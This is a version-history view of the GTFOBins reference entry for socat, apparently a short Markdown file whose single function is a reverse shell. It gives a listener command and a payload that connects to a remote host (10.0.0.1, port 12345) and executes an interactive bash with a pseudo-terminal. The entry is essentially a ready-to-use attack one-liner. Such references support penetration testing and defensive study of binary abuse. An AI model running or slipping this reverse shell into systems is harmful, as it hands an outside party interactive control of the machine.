GTFOBins.github.io/_gtfobins/socat.md

9 lines
299 B
Markdown
Raw Normal View History

2018-05-22 22:40:27 +02:00
---
functions:
reverse-shell:
2018-05-23 09:08:13 +02:00
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> to receive the shell on the other end.
2018-05-22 22:40:27 +02:00
code: |
RHOST=10.0.0.1
2018-05-23 09:08:13 +02:00
RPORT=12345
2018-05-22 22:40:27 +02:00
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
---